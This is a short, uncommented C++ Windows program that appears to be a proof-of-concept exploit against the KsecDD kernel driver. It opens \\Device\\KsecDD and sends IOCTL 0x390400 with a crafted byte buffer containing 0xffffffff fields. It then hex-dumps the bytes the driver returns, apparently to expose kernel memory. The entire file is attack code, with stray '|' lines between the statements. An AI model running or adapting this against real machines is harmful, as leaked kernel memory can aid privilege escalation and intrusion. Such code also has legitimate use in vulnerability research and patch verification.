#include <Windows.h>
|
#include <bcrypt.h>
|
#include <winternl.h>
|
#include <cstdio>
|
|
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
|
for (ULONG i = 0; i < dwBytes; i += 16) {
|
printf("%.8x: ", i);
|
|
for (ULONG j = 0; j < 16; j++) {
|
if (i + j < dwBytes) {
|
printf("%.2x ", Data[i + j]);
|
}
|
else {
|
printf("?? ");
|
}
|
}
|
|
for (ULONG j = 0; j < 16; j++) {
|
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
|
printf("%c", Data[i + j]);
|
}
|
else {
|
printf(".");
|
}
|
}
|
|
printf("\n");
|
}
|
}
|
|
int main() {
|
HANDLE hksecdd;
|
OBJECT_ATTRIBUTES objattr;
|
UNICODE_STRING ksecdd_name;
|
IO_STATUS_BLOCK iob;
|
NTSTATUS st;
|
|
RtlInitUnicodeString(&ksecdd_name, L"\\Device\\KsecDD");
|
InitializeObjectAttributes(&objattr, &ksecdd_name, 0, NULL, 0);
|
st = NtOpenFile(&hksecdd,
|
FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
|
&objattr,
|
&iob,
|
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
|
FILE_SYNCHRONOUS_IO_NONALERT);
|
if (!NT_SUCCESS(st)) {
|
printf("NtOpenFile failed, %x\n", st);
|
return 1;
|
}
|
|
BYTE InputBuffer[] = "\x4d\x3c\x2b\x1a\x00\x00\x02\x00\xff\xff\xff\xff\x00\x00\x00\x00\x20\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x02\x00\x00\x00\x33\x00\x44\x00\x45\x00\x53\x00\x00\x00";
|
BYTE OutputBuffer[0x200] = { /* zero padding */ };
|
DWORD BytesReturned = 0;
|
if (!DeviceIoControl(hksecdd, 0x390400, InputBuffer, sizeof(InputBuffer), OutputBuffer, sizeof(OutputBuffer), &BytesReturned, NULL)) {
|
printf("DeviceIoControl failed, %d\n", GetLastError());
|
CloseHandle(hksecdd);
|
return 1;
|
}
|
|
PrintHex(OutputBuffer, BytesReturned);
|
|
CloseHandle(hksecdd);
|
|
return 0;
|
}
|